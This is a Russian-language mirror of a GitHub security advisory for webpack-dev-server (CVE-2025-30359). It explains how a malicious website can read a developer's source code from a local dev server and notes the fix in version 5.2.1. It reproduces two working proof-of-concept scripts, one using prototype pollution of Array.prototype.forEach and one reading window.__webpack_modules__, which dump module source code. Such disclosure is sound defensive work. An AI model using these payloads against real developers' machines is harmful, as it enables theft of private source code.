GHSA-4v9v-hfq4-rm2v

Опубликовано: 04 июн. 2025

Источник: github

Github: Прошло ревью

CVSS3: 5.3

Описание

webpack-dev-server users' source code may be stolen when they access a malicious web site

Summary

Source code may be stolen when you access a malicious web site.

Details

Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject <script src="http://localhost:8080/main.js"> in their site and run the script. Note that the attacker has to know the port and the output entrypoint script path. Combined with prototype pollution, the attacker can get a reference to the webpack runtime variables. By using Function::toString against the values in __webpack_modules__, the attacker can get the source code.

PoC

Download reproduction.zip and extract it
Run npm i
Run npx webpack-dev-server
Open https://e29c9a88-a242-4fb4-9e64-b24c9d29b35b.pages.dev/
You can see the source code output in the document and the devtools console.

The script in the POC site is:

let moduleList const onHandlerSet = (handler) => { console.log('h', handler) moduleList = handler.require.m } const originalArrayForEach = Array.prototype.forEach Array.prototype.forEach = function forEach(callback, thisArg) { callback((handler) => { onHandlerSet(handler) }) originalArrayForEach.call(this, callback, thisArg) Array.prototype.forEach = originalArrayForEach } const script = document.createElement('script') script.src = 'http://localhost:8080/main.js' script.addEventListener('load', () => { console.log(moduleList) for (const key in moduleList) { const p = document.createElement('p') const title = document.createElement('strong') title.textContent = key const code = document.createElement('code') code.textContent = moduleList[key].toString() p.append(title, ':', document.createElement('br'), code) document.body.appendChild(p) } }) document.head.appendChild(script)

This script uses the function generated by renderRequire.

// The require function function __webpack_require__(moduleId) { // Check if module is in cache var cachedModule = __webpack_module_cache__[moduleId]; if (cachedModule !== undefined) { return cachedModule.exports; } // Create a new module (and put it into the cache) var module = __webpack_module_cache__[moduleId] = { // no module.id needed // no module.loaded needed exports: {} }; // Execute the module function var execOptions = { id: moduleId, module: module, factory: __webpack_modules__[moduleId], require: __webpack_require__ }; __webpack_require__.i.forEach(function(handler) { handler(execOptions); }); module = execOptions.module; execOptions.factory.call(module.exports, module, module.exports, execOptions.require); // Return the exports of the module return module.exports; }

Especially, it uses the fact that Array::forEach is called for __webpack_require__.i and execOptions contains __webpack_require__. It uses prototype pollution against Array::forEach to extract __webpack_require__ reference.

Impact

This vulnerability can result in the source code to be stolen for users that uses a predictable port and output path for the entrypoint script.

Old content

Summary

Source code may be stolen when you use output.iife: false and access a malicious web site.

Details

When output.iife: false is set, some global variables for the webpack runtime are declared on the window object (e.g. __webpack_modules__). Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject <script src="http://localhost:8080/main.js"> in their site and run the script. Note that the attacker has to know the port and the output entrypoint script path. By running that, the webpack runtime variables will be declared on the window object. By using Function::toString against the values in __webpack_modules__, the attacker can get the source code.

I pointed out output.iife: false, but if there are other options that makes the webpack runtime variables to be declared on the window object, the same will apply for those cases.

PoC

Download reproduction.zip and extract it
Run npm i
Run npx webpack-dev-server
Open https://852aafa3-5f83-44da-9fc6-ea116d0e3035.pages.dev/
Open the devtools console.
You can see the content of src/index.js and other scripts loaded.

The script in the POC site is:

const script = document.createElement('script') script.src = 'http://localhost:8080/main.js' script.addEventListener('load', () => { for (const module in window.__webpack_modules__) { console.log(`${module}:`, window.__webpack_modules__[module].toString()) } }) document.head.appendChild(script)

Impact

This vulnerability can result in the source code to be stolen for users that has output.iife: false option set and uses a predictable port and output path for the entrypoint script.

Ссылки

Пакеты

Наименование

webpack-dev-server

npm

Затронутые версииВерсия исправления

<= 5.2.0

5.2.1

EPSS

Процентиль: 12%

0.00042

Низкий

5.3 Medium

CVSS3

CVE ID

CVE-2025-30359

Дефекты

CWE-749

Связанные уязвимости

CVE-2025-30359

CVSS3: 5.3

redhat

3 месяца назад

webpack-dev-server allows users to use webpack with a development server that provides live reloading. Prior to version 5.2.1, webpack-dev-server users' source code may be stolen when they access a malicious web site. Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject a malicious script in their site and run the script. Note that the attacker has to know the port and the output entrypoint script path. Combined with prototype pollution, the attacker can get a reference to the webpack runtime variables. By using `Function::toString` against the values in `__webpack_modules__`, the attacker can get the source code. Version 5.2.1 contains a patch for the issue.

CVE-2025-30359

CVSS3: 5.3

nvd

3 месяца назад

EPSS

Процентиль: 12%

0.00042

Низкий

5.3 Medium

CVSS3

CVE ID

CVE-2025-30359

Дефекты

CWE-749